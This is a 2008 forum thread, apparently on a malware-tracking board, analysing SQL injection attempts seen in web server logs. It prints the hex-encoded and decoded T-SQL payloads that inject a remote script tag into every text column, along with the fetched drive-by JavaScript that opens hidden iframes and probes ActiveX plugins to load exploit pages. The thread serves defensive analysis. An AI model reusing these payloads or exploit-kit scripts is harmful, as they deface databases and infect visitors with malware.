src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087353&tpages=\'+a7353ops+\'&ttimes=\'+a7353ot+\'&tzone=\'+(0-a7353d.getTimezoneOffset()/60)+\'&tcolor=\'+a7353color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7353of)+\'&vpage=\'+escape(a7353op)+\'" \/>\');<\/script>');


Code: [Select]
--11:58:01--  http://www.cnzz.com/stat/website.php?web_id=1019605
           => `website.php?web_id=1019605'
Resolving www.cnzz.com... 127.0.0.1
Connecting to www.cnzz.com[127.0.0.1]:80... connected
HTTP request sent, awaiting response... 500

Comment, null rooted by DNS.


Code: [Select]
--11:59:17--  http://222.77.187.203/stat.htm?id=1019605
           => `stat.htm?id=1019605'
Connecting to 222.77.187.203:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
Power by Cnzz
Title: Re: SQL Injected jscript sites
Post by: JohnC on August 24, 2008, 10:12:03 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: Orac on September 20, 2008, 11:24:05 am
Having problems posting this one, will have to split it up

Sample Log entry
Code: [Select]
***.***.***.*** - - [19/Sep/2008:14:24:10 +0000] "GET /forums/index.php?showtopic=4260';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)" (malwarebytes.org) "-"

Decoded
Code: [Select]
***.***.***.*** - - [19/Sep/2008:14:24:10  0000] "GET /forums/index.php?showtopic=4260';DECLARE @S CHAR(4000);SET @S=CAST(DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update [' @T '] set [' @C ']=''"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--'' [' @C '] where ' @C ' not like ''%"></title><script src="http://www3.ss11qn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)" (malwarebytes.org) "-"


Code: [Select]
--11:48:09--  http://www3.ss11qn.cn/csrss/w.js
           => `w.js'
Resolving www3.ss11qn.cn... 121.11.76.85
Connecting to www3.ss11qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
window.onerror=function()
{

document.write("<iframe  width=0 height=0 src=http://www3.ss11qn.cn/csrss/new.htm></iframe>");

return true;
}

if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

document.write("<iframe  width=0 height=0 src=http://www3.ss11qn.cn/csrss/new.htm></iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}




Code: [Select]
--11:49:47--  http://www3.ss11qn.cn/csrss/new.htm
           => `new.htm'
Resolving www3.ss11qn.cn... 121.11.76.85
Connecting to www3.ss11qn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src="http://s123.cnzz.com/stat.php?id=1055584&web_id=1055584" language="JavaScript" charset="gb2312"></script>
<iframe src=06014.htm width=100 height=0></iframe>
<iframe src=flash.htm width=100 height=0></iframe>
<Iframe src=ff.htm width=100 height=0></iframe>
<Iframe src=ani.htm width=100 height=0></iframe>
<Iframe src=08053.htm width=100 height=0></iframe>
<Iframe src=tr.htm width=100 height=0></iframe>
<script>
var kaspersky="ffuck"
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTString"]()
try{if(new window["ActiveXObject"]("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31"))window["document"]["write"]('<iframe style=display:none src="lzx.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real11.htm"></iframe>');}catch(e){}   
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real10.htm"></iframe>');}catch(e){}   
try{if(new window["ActiveXObject"]("NCTAudioFile2.AudioFile2.2"))window["document"]["write"]('<iframe style=display:none src=net.htm"></iframe>');}catch(e){} 
try{if(new window["ActiveXObject"]("DPClient.Vod"))window["document"]["write"]('<iframe style=display:none src=xl.htm"></iframe>');}catch(e){} 
try{if(new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer"))window["document"]["write"]('<iframe style=display:none src="Bfyy.htm"></iframe>');}
catch(e){}
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<script src="http://js.users.51.la/2143797.js"></script>
<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>



Code: [Select]
--11:53:40--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
<html>
    <head>
        <title>运行时错误</title>
        <style>
        body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
        p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
        b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
        H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
        H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
        pre {font-family:"Lucida Console";font-size: .9em}
        .marker {font-weight: bold; color: black;text-decoration: none;}
        .version {color: gray;}
        .error {margin-bottom: 10px;}
        .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
        </style>
    </head>

    <body bgcolor="white">

            <span><H1>“/”应用程序中的服务器错误。<hr width=100% size=1 color=silver></H1>

            <h2> <i>运行时错误</i> </h2></span>

            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

            <b> 说明: </b>服务器上出现应用程序错误。此应用程序的当前自定义错误设置禁止远程查看应用程序错误的详细信息(出于安全原因)。但可以通过在本地服务器计算机上运行的浏览器查看。
            <br><br>

            <b>详细信息:</b> 若要使他人能够在远程计算机上查看此特定错误信息的详细信息,请在位于当前 Web 应用程序根目录下的“web.config”配置文件中创建一个 &lt;customErrors&gt; 标记。然后应将此 &lt;customErrors&gt; 标记的“mode”属性设置为“Off”。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;Off&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

            <b>注释:</b> 通过修改应用程序的 &lt;customErrors&gt; 配置标记的“defaultRedirect”属性,使之指向自定义错误页的 URL,可以用自定义错误页替换所看到的当前错误页。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

    </body>
</html>



Code: [Select]
--11:58:56--  http://s123.cnzz.com/stat.php
           => `stat.php'
Resolving s123.cnzz.com... 219.232.243.4
Connecting to s123.cnzz.com[219.232.243.4]:80... connected
HTTP request sent, awaiting response... 200 OK

This loads a zero byte page.


Code: [Select]
--12:00:13--  http://js.users.51.la/2143797.js
           => `2143797.js'
Resolving js.users.51.la... 122.224.146.77
Connecting to js.users.51.la[122.224.146.77]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2143797" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');


Code: [Select]
--12:03:42--  http://www.51.la/?2143797
           => `?2143797'
Resolving www.51.la... 222.88.95.2
Connecting to www.51.la[222.88.95.2]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<style type="text/css">
body {font-size:12px;line-height:120%;font-family:宋体;word-break: break-all;}
a {color: #000;text-decoration: none}
a:hover {color: #1653C2}
.a1 {color: #1653C2}
.a1:hover {color: #000}
img {border:none}
div {text-align:left}
#index_menu {margin:auto;width:760px;border-bottom:2px solid #1653C2;padding:0px;height:21px;text-align:center}
#index_menu ul {margin:0px;padding:4px 4px 0px 4px}
#index_menu li {display:inline;}
#index_menu a {color:#1653C2;padding:4px 15px 4px 15px}
#index_menu a:hover {color:#000;background-color:#EFEFEF}
#index_menu a.dq {color:#FFF;background-color:#1653C2}
#allbody {width:760px;margin: 0 auto}
#bottom {float: left;width:760px;text-align: center;margin-top:15px;border-top:1px solid #ACC1E8;padding:10px 0px;background-color:#E0E9FC;}
</style>
<title>us统计报告 - “我要啦”提供</title>
</head>
<body>
<div style="margin:20px 0px 20px 0px;text-align:center"><img alt="我要啦免费统计" src="http://51img.ajiang.net/main_logo.gif" /><br /><a href="http://bbs.51.la/forum-1-1.html">我要啦免费统计</a></div>
<div id="index_menu">
 <ul>
  <li><a href="http://bbs.51.la/forum-1-1.html">站长交流大厅</a></li>
  <li><a href="./" class="dq">首页</a></li>
  <li><a href="reg.asp">申请</a></li>
  <li><a href="login.asp">登录</a></li>
  <li><a href="http://top.51.la/">排行</a></li>
  <li><a href="news.asp">日志</a></li>
  <li><a href="http://help.51.la/">帮助</a></li>
 </ul>
</div>
<div id="allbody">
<div style="line-height:200%;margin:35px;text-align:center">
<a class="a1" href="http://help.51.la/faq/#17">什么是独立查看密码?</a>&nbsp;
<a class="a1" href="login.asp">【us】的站长请点击这里登录</a><br />
<form action="report/0_help.asp" style="margin:5px 0px 18px 0px">
<center>
<input type="hidden" name="id" value="2143797" />
<input type="hidden" name="t" value="chalogin" />
独立查看密码 <input name="LookPass" type="password" size="20" /> <input type="submit" value="查看〖 us 〗的统计报告" />
</center>
</form>

<span style="color:red">请注意: 您可能来自我要啦免费统计用户的网站,我要啦仅提供免费统计服务,与该网站经营活动无关。</span><br />

<a style="font-size:16px" href="reg.asp">申请您自己的免费统计账号</a>
<br /><a href="about.asp" title="为什么选择我要啦免费统计">了解网站现状·把握网站脉搏·超越发展极限——我要啦统计,站长智明的眼睛<!--功能更全面·数据更精确·操作更简便·服务更专业——我要啦统计,当然之选--></a>
<br /><a class="a1" href="report/1_main.asp?id=1" target="_blank" style="font-size:14px"> - 全 功 能 演 示 - </a>
</div>
<div style="width:760px;text-align: center;">
  <a href="http://union.wowowang.com/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_wowowang.gif" /></a>
  <a href="http://www.nicewords.org/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_nicewords.gif" /></a>
  <a href="http://www.kaikai8.com/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_kaikai8.gif" /></a>
  <a href="http://www.fenghuangchuanqi.com/?51la" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_fenghuangchuanqi.gif" /></a>
  <a href="http://www.zitian.cn/" target="_blank"><img alt="紫田网络平价域名" src="http://51img.ajiang.net/index_ztdm.gif" /></a>
  <a href="http://www.jjoobb.cn/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_jjoobb.gif" /></a>
</div>
<div style="margin:15px 0px;text-align:center;width:760px;line-height:20px">善者吾善之,不善者吾亦善之,得善。信者吾信之,不信者吾亦信之,得信。<br />
<span id="ajiang_51la"></span>上善若水。水利万物而不争,处众人之所恶,顾几于道。

</div>
<div style="float: left;width:760px;text-align:center;margin-top:12px">
<a class="a1" href="/rule.asp">用户守则</a>
| <a class="a1" href="/usergetpass.asp">找回密码</a>
| <a class="a1" href="/friend.asp">广告联系</a>
| <a class="a1" href="/users.asp">典型用户</a>
| <a class="a1" href="/contact.asp">联系我们</a>
| <a class="a1" href="/about.asp">关于我们</a>
</div>
<div id="bottom">
服务器及带宽由 <a href="http://www.zitian.cn/" target="_blank">紫田网络(Zitian.CN)</a> 提供<br />
我要啦免费统计 Powered by <a href="http://www.ajiang.net/" target="_blank">Ajiang.net</a> 豫ICP备05009218号<br />

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script type="text/javascript" src="http://js.users.51.la/5.js"></script>
<noscript><a href="http://www.51.la/?5" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/5.asp" style="border:none" /></a></noscript>
</div>
</div>

</body>
</html>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>




Code: [Select]
--12:06:53--  http://js.users.51.la/5.js
           => `5.js'
Resolving js.users.51.la... 122.224.146.77
Connecting to js.users.51.la[122.224.146.77]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?5" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1; VIP &#x7528;&#x6237;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a5tf="51la";var a5pu="";var a5pf="51la";var a5su=window.location;var a5sf=document.referrer;var a5of="";var a5op="";var a5ops=1;var a5ot=1;var a5d=new Date();var a5color="";if (navigator.appName=="Netscape"){a5color=screen.pixelDepth;} else {a5color=screen.colorDepth;}<\/script><script>a5tf=top.document.referrer;<\/script><script>a5pu =window.parent.location;<\/script><script>a5pf=window.parent.document.referrer;<\/script><script>a5ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a5ops=(a5ops==null)?1: (parseInt(unescape((a5ops)[2]))+1);var a5oe =new Date();a5oe.setTime(a5oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a5ops+ ";path=/;expires="+a5oe.toGMTString();a5ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a5ot==null){a5ot=1;}else{a5ot=parseInt(unescape((a5ot)[2])); a5ot=(a5ops==1)?(a5ot+1):(a5ot);}a5oe.setTime(a5oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a5ot+";path=/;expires="+a5oe.toGMTString();<\/script><script>a5of=a5sf;if(a5pf!=="51la"){a5of=a5pf;}if(a5tf!=="51la"){a5of=a5tf;}a5op=a5pu;try{lainframe}catch(e){a5op=a5su;}document.write(\'<img style="width:0px;height:0px" src="http://vip.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=19&id=5&tpages=\'+a5ops+\'&ttimes=\'+a5ot+\'&tzone=\'+(0-a5d.getTimezoneOffset()/60)+\'&tcolor=\'+a5color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a5of)+\'&vpage=\'+escape(a5op)+\'" \/>\');<\/script>');


Code: [Select]
--12:03:42--  http://www.51.la/?5
           => `?5'
Resolving www.51.la... 222.88.95.2
Connecting to www.51.la[222.88.95.2]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<style type="text/css">
body {font-size:12px;line-height:120%;font-family:宋体;word-break: break-all;}
a {color: #000;text-decoration: none}
a:hover {color: #1653C2}
.a1 {color: #1653C2}
.a1:hover {color: #000}
img {border:none}
div {text-align:left}
#index_menu {margin:auto;width:760px;border-bottom:2px solid #1653C2;padding:0px;height:21px;text-align:center}
#index_menu ul {margin:0px;padding:4px 4px 0px 4px}
#index_menu li {display:inline;}
#index_menu a {color:#1653C2;padding:4px 15px 4px 15px}
#index_menu a:hover {color:#000;background-color:#EFEFEF}
#index_menu a.dq {color:#FFF;background-color:#1653C2}
#allbody {width:760px;margin: 0 auto}
#bottom {float: left;width:760px;text-align: center;margin-top:15px;border-top:1px solid #ACC1E8;padding:10px 0px;background-color:#E0E9FC;}
</style>
<title>我要啦免费统计统计报告 - “我要啦”提供</title>
</head>
<body>
<div style="margin:20px 0px 20px 0px;text-align:center"><img alt="我要啦免费统计" src="http://51img.ajiang.net/main_logo.gif" /><br /><a href="http://bbs.51.la/forum-1-1.html">我要啦免费统计</a></div>
<div id="index_menu">
 <ul>
  <li><a href="http://bbs.51.la/forum-1-1.html">站长交流大厅</a></li>
  <li><a href="./" class="dq">首页</a></li>
  <li><a href="reg.asp">申请</a></li>
  <li><a href="login.asp">登录</a></li>
  <li><a href="http://top.51.la/">排行</a></li>
  <li><a href="news.asp">日志</a></li>
  <li><a href="http://help.51.la/">帮助</a></li>
 </ul>
</div>
<div id="allbody">
<div style="line-height:200%;margin:35px;text-align:center">
<a class="a1" style="font-size:14px" href="report/1_main.asp?id=5">&gt;&gt; 查看〖 我要啦免费统计 〗的统计报告 &gt;&gt;</a><br />

<a style="font-size:16px" href="reg.asp">申请您自己的免费统计账号</a>
<br /><a href="about.asp" title="为什么选择我要啦免费统计">了解网站现状·把握网站脉搏·超越发展极限——我要啦统计,站长智明的眼睛<!--功能更全面·数据更精确·操作更简便·服务更专业——我要啦统计,当然之选--></a>
<br /><a class="a1" href="report/1_main.asp?id=1" target="_blank" style="font-size:14px"> - 全 功 能 演 示 - </a>
</div>
<div style="width:760px;text-align: center;">
  <a href="http://union.wowowang.com/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_wowowang.gif" /></a>
  <a href="http://www.nicewords.org/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_nicewords.gif" /></a>
  <a href="http://www.kaikai8.com/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_kaikai8.gif" /></a>
  <a href="http://www.fenghuangchuanqi.com/?51la" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_fenghuangchuanqi.gif" /></a>
  <a href="http://www.zitian.cn/" target="_blank"><img alt="紫田网络平价域名" src="http://51img.ajiang.net/index_ztdm.gif" /></a>
  <a href="http://www.jjoobb.cn/" target="_blank"><img alt="广告" src="http://51img.ajiang.net/index_jjoobb.gif" /></a>
</div>
<div style="margin:15px 0px;text-align:center;width:760px;line-height:20px">善者吾善之,不善者吾亦善之,得善。信者吾信之,不信者吾亦信之,得信。<br />
<span id="ajiang_51la"></span>上善若水。水利万物而不争,处众人之所恶,顾几于道。

</div>
<div style="float: left;width:760px;text-align:center;margin-top:12px">
<a class="a1" href="/rule.asp">用户守则</a>
| <a class="a1" href="/usergetpass.asp">找回密码</a>
| <a class="a1" href="/friend.asp">广告联系</a>
| <a class="a1" href="/users.asp">典型用户</a>
| <a class="a1" href="/contact.asp">联系我们</a>
| <a class="a1" href="/about.asp">关于我们</a>
</div>
<div id="bottom">
服务器及带宽由 <a href="http://www.zitian.cn/" target="_blank">紫田网络(Zitian.CN)</a> 提供<br />
我要啦免费统计 Powered by <a href="http://www.ajiang.net/" target="_blank">Ajiang.net</a> 豫ICP备05009218号<br />

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script type="text/javascript" src="http://js.users.51.la/5.js"></script>
<noscript><a href="http://www.51.la/?5" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/5.asp" style="border:none" /></a></noscript>
</div>
</div>

</body>
</html>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>

Title: Re: SQL Injected jscript sites
Post by: Orac on September 20, 2008, 11:24:51 am

Code: [Select]
--12:13:46--  http://bbs.51.la/forum-1-1.html
           => `forum-1-1.html'
Resolving bbs.51.la... 203.171.229.47
Connecting to bbs.51.la[203.171.229.47]:80... connected
HTTP request sent, awaiting response... 200 OK

THis still wont post due to its size, so ive added it as an attachment.
Title: Re: SQL Injected jscript sites
Post by: JohnC on September 26, 2008, 06:39:03 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: Orac on October 11, 2008, 11:00:04 am
Log entry
Code: [Select]
xxx.xxx.xxx.xxx - - [10/Oct/2008:16:49:11 +0000] "GET /forum/viewtopic.php?f=11&t=28980';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 524 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AntivirXP08; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" (malwareremoval.com) "-"

Decoded, note new file location.
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www3.ss11qn.cn/csrss/new.htm"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www3.ss11qn.cn/csrss/new.htm"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Looks as thou the site is no longer available.
Quote
[www3.ss11qn.cn]
Error getting IP Address:
No such host is known.

Quote
Retrieving DNS records for www3.ss11qn.cn...

Attempt to get a DNS server for www3.ss11qn.cn failed: www3.ss11qn.cn does not exist in the DNS
Title: Re: SQL Injected jscript sites
Post by: Orac on October 12, 2008, 01:39:55 pm
New site, we had a total of 44 differnt attempts involving this one in the overnight logs.

Log entry
Code: [Select]
